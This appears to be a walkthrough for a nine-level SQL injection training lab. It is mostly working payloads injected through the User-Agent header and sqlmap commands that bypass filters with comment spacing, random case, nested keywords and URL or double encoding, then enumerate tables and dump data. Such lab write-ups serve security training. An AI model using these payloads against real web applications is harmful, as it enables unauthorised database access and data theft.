SQL Injection

Level 1

The application reads the user agent value and then shows that . By changing the value to a single quote we can get the following error which reveals that MySQL is in use.

' UNION SELECT user(); -- -

otherise save the request from Burp and use SQLMap
sqlmap -r level1 --banner -D 1sqlilabs -T browsers --dump

Level 2

In this level UNION and standard payloads are filtered.

sqlmap -u 'http://2.sqli.labs/' -p user-agent --user-agent=elsagent --technique=B --banner

Level 3

This level spaces are not allowed.

/'/**/UNION/**/SELECT/**/@@version;#

sqlmap -u 'http://3.sqli.labs/' -p user-agent --user-agent=blah  --banner --tamper=space2comment

Level 4

Comments are blocked in this level.

'UNION(select('PoC String'));#

# Enumerating the tables
'union(SELECT(group_concat(table_name))FROM(information_schema.columns)where(table_schema=database()));#

# Enumerating the columns
'union(SELECT(group_concat(column_name))FROM(information_schema.columns)where(table_name='secretcustomers'));#

Level 5

Same as above, but had to use double quotes.

Level 6

Needed a random case with every letter to bypass the filter. SQLMap randomcase tamper script can be used for this level.

Level 7

Non-recursive filter for the reserved words.

' uZEROFILLnZEROFILLiZEROFILLoZEROFILLnZEROFILL ZEROFILLsZEROFILLeZEROFILLlZEROFILLeZEROFILLcZEROFILLt ZEROFILL@@ZEROFILLvZEROFILLeZEROFILLrZEROFILLsZEROFILLiZEROFILLoZEROFILLnZEROFILL; ZEROFILL-- ZEROFILL-ZEROFILL

Level 8

URL encoding.

%61%61%61%61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%3b%20%2d%2d%20%2d

Level 9

Double char encode.

%25%36%31%25%36%31%25%36%31%25%36%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%37%36%25%36%35%25%37%32%25%37%33%25%36%39%25%36%66%25%36%65%25%33%62%25%32%30%25%32%64%25%32%64%25%32%30%25%32%64

sqlmap -u 'http://9.sqli.labs/' -p user-agent --tamper=chardoubleencode --banner --level=3